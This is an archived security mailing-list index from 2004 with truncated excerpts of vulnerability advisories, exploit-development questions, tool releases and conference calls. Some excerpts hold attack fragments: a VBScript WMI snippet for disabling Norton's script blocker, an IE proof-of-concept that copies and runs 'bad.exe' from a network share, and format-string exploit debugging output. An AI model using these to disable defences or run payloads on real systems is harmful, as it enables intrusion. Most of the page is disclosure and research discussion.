Vuln Dev
ISS BlackIce Server Protect Unprivileged User Attack 2004-08-11
Thomas Ryan (tommy providesecurity com) (1 replies)
Release Date:
August 11, 2004

Severity:
Medium

Vendor:
Internet Security Systems

Software:
BlackIce Server Protect 3.6cno and below

Remote:
Remotely Executable from Local and Trusted Networks

Vulnerabilities:
Unprivileged User Attack

Technical Details:
Unprivileged User Attack was originally

Metasploit Framework v2.2 (with SDK) 2004-08-12
H D Moore (sflist digitaloffense net)
The Metasploit Framework is an advanced open-source exploit development
platform. The 2.2 release includes three user interfaces, 30 exploits and
40 payloads. Additionally, this is the first public release to contain
the new in-memory DLL-injection system[1] and the VNC (remote desktop)
payload[2

Re: CORE-2004-0705: Vulnerabilities in PuTTY and PSCP 2004-08-10
infamous41md hotpop com
anyone tried exploiting this yet? i foolishly assumed it wouldn't be that
difficult to exploit w/o modifying source for an ssl server. sniffed some
packets, got hexdumps of the packets, wrote a prog to pretend to be an ssl
server - which sent out the dumps of the packets i sniffed. only to then
r

Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT 2004-08-02
Arpa Net (arpa linuxmail org)

>
> So I get Bus error (core dumped) result. But in my opinion I should get shell.
> Somehow exploit is not working and I don't know the reason.
> I tried many times and no result.
> It seems like format string exploit in FreeBSD is different than Linux.

This exploit code uses bash, in bsd root ma

Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT 2004-07-31
Vlad902 (vlad902 gmail com) (1 replies)
-bash-2.05b$ uname -msr
FreeBSD 5.2.1-RC2 i386
-bash-2.05b$ gcc -o fmt_vuln fmt_vuln.c
-bash-2.05b$ nm fmt_vuln | grep __DTOR_END__
08049848 d __DTOR_END__
-bash-2.05b$ gdb -q ./fmt_vuln
(no debugging symbols found)...(gdb)
(gdb) x/1s 0xbfbfedf5
0xbfbfedf5: "EGG=vlad902"
(gdb) b * 0xbfbfedf9
Br

Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT 2004-08-02
Ganbold (ganbold micom mng net)
Problem with format string exploit dev in FreeBSD 5.2-CURRENT 2004-07-29
Ganbold (ganbold micom mng net) (1 replies)
Hi all,

I have sample format string exploit problem in FreeBSD 5.2-CURRENT.

$uname -an
FreeBSD localhost 5.2-CURRENT FreeBSD 5.2-CURRENT #8: Wed Mar 3 11:09:58
ULAT 2004 tsgan@localhost:/usr/obj/usr/src/sys/MX i386

I'm using http://www.groar.org/expl/howto/fmtbuilder.txt to build the
form

Call for Open Source Privacy and Security Projects and Papers 2004-07-25
Pete Herzog (pete isecom org)
/ Call for Open Source Privacy and Security Projects and Papers /

Projects and papers for exhibition and forum accepted now for the 2nd
ISESTORM at the University of Nevada, Las Vegas, October 16 to 23.
Final deadline for registration is August 30th.

/ About the Forum /

The forum is a tribute t

Announcing Pak Con 1st 2004-07-25
fz pakcon org

A N N O U N C I N G P A K C O N 1st
The Pakistan's Hacking Convention

[ theme ]

We are proud to announce the 1st Pak Con Hacking Convention, the first
ever security and hacking seminar of its kind in Pakistan.

In an age where information is treasure and the treasure house is the
virtual netwo

samba base64 encode vulnerability 2004-07-23
infamous41md hotpop com (1 replies)
a question about exploiting the samba vuln.

if (*s == '=') n -= 1;

/* fix up length */
decoded.length = n;

memcpy(s, decoded.data, decoded.length);

if n == 0 before it is decremented, then it will wrap around to ~0 and the memcpy will eventually SEGFAULT. but can you exploit it

Re: samba base64 encode vulnerability 2004-07-24
Valdis Kletnieks vt edu (1 replies)
Re: samba base64 encode vulnerability 2004-07-24
infamous41md hotpop com
Inappropriate methods exposed in XML -what's the essence? 2004-07-20
portsmut navigator lv
Does somebody know what is essence of Microsoft Security Bulletin
MS02-052: what is so called "inappropriate methods exposed in XML
support classes" (CVE-CAN-2002-0865). Could anybody compile some POC
exploit showing this problem?

Regards,

Alex

Norton Anti Virus Script Blocker bypass using script(vb,js,...) II 2004-07-16
vozzie gmail com


what i forgot to say in previous post,...

if you start the script with killing Norton AV it's Script Blocker, then Script Blocker will not warn anymore when script is about to use 'dangerous' objects,...

' get wmi

set wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")

Norton Anti Virus Script Blocker bypass using script(vb,js,...) 2004-07-16
vozzie gmail com


DoS out NAV using WMI, used to work for the last years

i think it's not supposed to work this way

set wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")

for each e in wmi.ExecQuery("Select * from Win32_Product")

on error resume next

if instr(e.name,"Script") and i

Microsoft Window Utility Manager Local Elevation of Privileges 2004-07-13
Vivek Rathod (Application Security, Inc.) (vrathod appsecinc com)
Microsoft Window Utility Manager Local Elevation of Privileges

July 13, 2004

Credit: This vulnerability was researched and discovered by Cesar Cerrudo.

Risk Level: High

Summary: A local elevation of privileges exists in the Windows Utility
Manager which allows any user to take complete control

FW: Windows XP Prof and shdoclc.dll - zone-pass and site spoofing 2004-07-14
V. Poddubnyy (vpoddubniy mail ru)
Hi!

A little update: it was without changing your URL to point to the real
shdoclc.dll and under Normal user account. Under Administrator the disk was
renamed, under Normal user I don't have permission to rename disks.

So exploit works with those people who are browsing as administrators and
setup

Unchecked buffer in mstask.dll 2004-07-14
Brett Moore (brett moore security-assessment com)
========================================================================

= Unchecked buffer in mstask.dll
=
= MS Bulletin posted:
= http://www.microsoft.com/technet/security/bulletin/MS04-022.mspx
=
= Affected Software:
= Microsoft Windows 2000 Service Pack 4
= Microsoft Windows XP, Microsoft Windo

HtmlHelp - .CHM File Heap Overflow 2004-07-14
Brett Moore (brett moore security-assessment com)
========================================================================

= HtmlHelp - .CHM File Heap Overflow
=
= MS Bulletin posted:
= http://www.microsoft.com/technet/security/bulletin/MS04-023.mspx
=
= Affected Software:
= Microsoft Windows 98, 98SE, ME
= Microsoft Windows NT 4.0
= Microsoft Win

IE Shell URI Download and Execute, POC 2004-07-14
Ferruh Mavituna (ferruh mavituna com)
Hello;

Code is based on http://www.securityfocus.com/archive/1/367878 (POC by
Jelmer) message. I just added a new feature "download" and then execute
application. Also I use Wscript.Shell in Javascript instead of
Shell.Application.

1- copy \\IPADDRESS\NULLSHAREDFOLDER\bad.exe (stealth)
2- Wait fo

phrack #62 has been released 2004-07-13
phrack staff (rm segfault net)
Hi,

Tue Jul 13 00:58:42 UTC - PHRACK #62 HAS BEEN RELEASED.

*** NOW AVAILABLE AT HTTP://WWW.PHRACK.ORG ****
*** NOW AVAILABLE AT HTTP://WWW.PHRACK.ORG ****
*** NOW AVAILABLE AT HTTP://WWW.PHRACK.ORG ****

PHRACK MAGAZINE is one of the longest running electronic magazines

Windows XP Prof and shdoclc.dll - zone-pass and site spoofing 2004-07-13
Bartosz Kwitkowski (bartosz wb pl) (1 replies)


details:

OS: Windows XP Prof (fully patched), IE 6.0

LANG: Polish (of course).

VULN:

1.this is zone-by-pass. Opening IE window is in My Computer zone.

You can paste script into this page and it will be executed as local.

I think this is very serious vuln.

2.site spoofing. You can cr

RE: Windows XP Prof and shdoclc.dll - zone-pass and site spoofing 2004-07-13
V. Poddubnyy (vpoddubniy mail ru)
White Paper: 0x00 vs ASP file upload scripts 2004-07-13
Brett Moore (brett moore security-assessment com)
We are proud to announce the release of our latest white paper
titled 0x00 vs ASP file upload scripts.

.Abstract.
The effects of the `Poison NULL byte` have not been widely
explored in ASP, but as with other languages the NULL byte
can cause problems when ASP passes data to objects.

Many upload sy

Re: Norton AntiVirus Remote Denial Of Service Vulnerability [Part: !!!_update] 2004-07-12
Bipin Gautam (visitbipin hotmail com)
In-Reply-To: <20040710014540.25125.qmail (at) mail2.securityfocus (dot) com [email concealed]>

>From: "Dr PC Fix Security" <Security (at) drpcfix (dot) com [email concealed]>

<20040709123046.31037.qmail (at) www.securityfocus (dot) com [email concealed]>

>Norton 2002, consumed about 20% cpu for 3 seconds until it found the

DHCPing 0.90 2004-07-10
Gregory Duchemin (c3rb3r sympatico ca)
Hello,
DHCPing 0.90 (Unix) is available at http://dhcping.openwall.net.
It should be of a great help during your dhcp(d) security audits
providing a lot of options to create custom (in)valid dhcp/bootp traffic
a la Hping.
Also it features several exploits for the latest Isc Infoblox and Dlink
vul

Copyright 2010, SecurityFocus